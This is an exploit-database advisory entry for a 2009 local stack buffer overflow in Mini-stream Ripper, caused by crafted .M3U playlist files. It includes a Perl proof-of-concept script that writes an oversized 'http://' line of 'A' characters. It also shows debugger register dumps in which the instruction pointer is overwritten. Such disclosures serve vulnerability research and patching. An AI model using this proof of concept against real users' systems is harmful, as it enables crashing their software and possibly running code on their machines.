Mini-stream Ripper (.M3U File) Local Stack Overflow POC

vendor:

Mini-stream Ripper

by:

Cyber-Zone (ABDELKHALEK)

9,3

CVSS

HIGH

Stack Overflow

119

CWE

Product Name: Mini-stream Ripper

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Mini-stream Ripper (.M3U File) Local Stack Overflow POC

A stack-based buffer overflow vulnerability exists in Mini-stream Ripper, a program used to convert RealMedia files to MP3. The vulnerability is caused due to a boundary error when handling .M3U files. This can be exploited to cause a stack-based buffer overflow by tricking a user into opening a specially crafted .M3U file. Successful exploitation may allow execution of arbitrary code.

Mitigation:

Upgrade to the latest version of Mini-stream Ripper.

Source

Exploit-DB raw data:

#!/usr/bin/perl
#
#
# *************************************************************
# *  Mini-stream Ripper (.M3U File) Local Stack Overflow POC  *
# *************************************************************
#
# Found By : Cyber-Zone (ABDELKHALEK)
# E-mail   : Paradis_des_fous@hotmail.fr
# Home     : WwW.IQ-TY.CoM ; WwW.No-Exploit.CoM
# Greetz   : Hussin X , Jiko (my brother), ZoRLu , Nabilx , Mag!c ompo , Stack ... all mgharba HaCkers and Sec-r1z.com
#
# Download product : http://www.rm-to-mp3.net/downloads/Mini-streamRipper.exe
#
#
# Olly registers
#EAX 00000001
#ECX 41414141
#EDX 00D30000
#EBX 00333D60 ASCII "C:\Documents and Settings\Administrateur\Bureau\KHAL.m3u"
#ESP 000F70CC ASCII "AAAA"
#EBP 000FBFB4
#ESI 77C2FCE0 msvcrt.77C2FCE0
#EDI 0000CC2E
#EIP 41414141
#
my $Header = "#EXTM3U\n";

my $ex="http://"."A" x 26129; # note exact this just the POC

open(MYFILE,'>>KHAL.m3u');

print MYFILE $Header.$ex;

close(MYFILE);

# milw0rm.com [2009-04-13]